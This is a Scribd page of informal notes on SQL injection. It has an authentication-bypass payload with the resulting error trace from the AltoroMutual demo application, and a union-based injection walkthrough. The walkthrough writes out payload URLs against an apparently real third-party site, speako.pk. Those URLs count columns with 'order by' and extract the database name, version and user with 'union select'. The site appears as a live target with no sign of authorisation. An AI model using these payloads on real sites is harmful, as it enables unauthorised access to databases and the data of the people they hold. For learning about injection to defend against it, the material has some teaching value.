Scribd
Upload
111 views4 pages

'Or'1' 1' - An Error Has Occurred: Summary

This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

Uploaded by

Thirumala Kakani
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
111 views4 pages

'Or'1' 1' - An Error Has Occurred: Summary

This document describes an SQL injection error that occurred due to a syntax error in the query expression. It provides the error message and stack trace detailing that the error was caused by a missing operator in the username and password values, which contained malicious SQL code ('or'1'=1).

Uploaded by

Thirumala Kakani
Copyright
© © All Rights Reserved
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
Download as docx, pdf, or txt
Download as docx, pdf, or txt
You are on page 1/ 4

'or'1'=1' ------

An Error Has Occurred


Summary:
Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND password = ''or'1'=1'''.

Error Message:
System.Data.OleDb.OleDbException: Syntax error (missing operator) in query expression 'username = ''or'1'=1'' AND
password = ''or'1'=1'''. at System.Data.OleDb.OleDbCommand.ExecuteCommandTextErrorHandling(OleDbHResult hr)
at System.Data.OleDb.OleDbCommand.ExecuteCommandTextForSingleResult(tagDBPARAMS dbParams, Object&
executeResult) at System.Data.OleDb.OleDbCommand.ExecuteCommandText(Object& executeResult) at
System.Data.OleDb.OleDbCommand.ExecuteCommand(CommandBehavior behavior, Object& executeResult) at
System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method) at
System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior) at
System.Data.OleDb.OleDbCommand.System.Data.IDbCommand.ExecuteReader(CommandBehavior behavior) at
System.Data.Common.DbDataAdapter.FillInternal(DataSet dataset, DataTable[] datatables, Int32 startRecord, Int32
maxRecords, String srcTable, IDbCommand command, CommandBehavior behavior) at
System.Data.Common.DbDataAdapter.Fill(DataSet dataSet, Int32 startRecord, Int32 maxRecords, String srcTable,
IDbCommand command, CommandBehavior behavior) at System.Data.Common.DbDataAdapter.Fill(DataSet dataSet,
String srcTable) at Altoro.Authentication.ValidateUser(String uName, String pWord) in
c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 68 at Altoro.Authentication.Page_Load(Object sender,
EventArgs e) in c:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs:line 33 at
System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at
System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at
System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean
includeStagesAfterAsyncPoint)
s
Union/error based sql injection:-

In thi sql injection we are trying the old method menas authentication bypass method but it wont
work . so we can try in different manner

If we open any website ---it having number of subpages ---

Eg :- speako.pk

Every website having number of subpages (tabs) we can go through any of the ab it will display the id
of that one the id will display left bottom of the screen

We are open any tab and inject at the end of url ----it diaplays

-blankpage

-error message

--- datalose ( some of the images are content is lost from website)

Speako.pk at the end put

http://speako.pk/page.php?id=165order by 1-- (nochanges)

http://speako.pk/page.php?id=165order by 14-- (n0 changes)

when we give order by 15 ---it displays blank page --- ( means 14 columns in that application r database)

http://speako.pk/page.php?id=165 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

the above one is used to identify which clumns are more vulnerables..

http://speako.pk/page.php?id=165 union select 1,database(),3,4,5,6,7,8,9,10,11,12,13,14

http://speako.pk/page.php?id=165 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14

http://speako.pk/page.php?id=165 union select 1,user(),3,4,5,6,7,8,9,10,11,12,13,14

You might also like